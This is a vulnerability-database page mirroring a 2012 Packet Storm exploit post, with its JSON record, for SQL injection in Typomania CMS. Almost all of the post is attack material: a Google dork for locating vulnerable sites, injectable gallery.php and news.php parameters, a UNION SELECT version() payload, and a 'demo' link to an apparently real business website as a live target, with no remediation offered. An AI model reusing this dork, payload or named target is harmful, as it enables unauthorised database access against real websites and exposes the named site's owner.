Search...

Typomania CMS SQL Injection

2012-08-25T00:00:00

ID PACKETSTORM:115899
Type packetstorm
Reporter Crim3R
Modified 2012-08-25T00:00:00

Description

                                        
                                            `###################################################################################  
  
# Exploit Title: Typomania CMS cms Sql Injection Vulnerability  
#  
# Google Dork:intext:"powered by Typomania CMS"  
#  
# Date: 08/24/2012  
#  
# Author: Crim3R  
#  
# Vendor Home :   
http://www.typomania.co.uk/typomania/products/typomania-service-plans/  
#  
# Tested on: all  
#  
###################################################################################  
  
$  
$ ----Author will be not responsible for any damage----  
$  
###################################################################################  
  
  
========================================  
http://www.target.com/gallery.php?id=[id]'  
http://www.target.com/news.php?item_id=[id]'  
+union+select+version()--  
D3M0 :   
http://www.wildarttaxidermy.co.uk/news.php?item_id=27  
  
===============Crim3R@Att.Net===========  
  
$home = %00  
thanks to : 2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir  
`

JSON Vulners Source

Initial Source

{"reporter": "Crim3R", "enchantments": {"score": {"vector": "NONE", "value": 7.5}, "vulnersScore": 7.5}, "published": "2012-08-25T00:00:00", "cvelist": [], "lastseen": "2016-11-03T10:28:25", "history": [], "id": "PACKETSTORM:115899", "sourceHref": "https://packetstormsecurity.com/files/download/115899/typomania-sql.txt", "objectVersion": "1.2", "sourceData": "`################################################################################### \n \n# Exploit Title: Typomania CMS cms Sql Injection Vulnerability \n# \n# Google Dork:intext:\"powered by Typomania CMS\" \n# \n# Date: 08/24/2012 \n# \n# Author: Crim3R \n# \n# Vendor Home : \nhttp://www.typomania.co.uk/typomania/products/typomania-service-plans/ \n# \n# Tested on: all \n# \n################################################################################### \n \n$ \n$ ----Author will be not responsible for any damage---- \n$ \n################################################################################### \n \n \n======================================== \nhttp://www.target.com/gallery.php?id=[id]' \nhttp://www.target.com/news.php?item_id=[id]' \n+union+select+version()-- \nD3M0 : \nhttp://www.wildarttaxidermy.co.uk/news.php?item_id=27 \n \n===============Crim3R@Att.Net=========== \n \n$home = %00 \nthanks to : 2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir \n`\n", "cvss": {"vector": "NONE", "score": 0.0}, "description": "", "references": [], "edition": 1, "title": "Typomania CMS SQL Injection", "type": "packetstorm", "modified": "2012-08-25T00:00:00", "hash": "361bd9cae7034e8e825b0e840d244f784224c66d7e4f79d4bdb7db84e825314b", "bulletinFamily": "exploit", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d4be9c4fc84262b4f39f89565918568f", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "9fcd885fbcda4883533f2720aff55e3f", "key": "href"}, {"hash": "bc339c7b69513906085fb3a50edba3e0", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "bc339c7b69513906085fb3a50edba3e0", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "70db969f88a9b0ac497fcb59806c0942", "key": "reporter"}, {"hash": "7ff8baebba45319d8007f650dea7dcea", "key": "sourceData"}, {"hash": "3801d0cf287a4a9556d443304d7732e3", "key": "sourceHref"}, {"hash": "d3c5652240e21bf10134b8c9980acdc7", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}], "href": "https://packetstormsecurity.com/files/115899/Typomania-CMS-SQL-Injection.html", "viewCount": 0}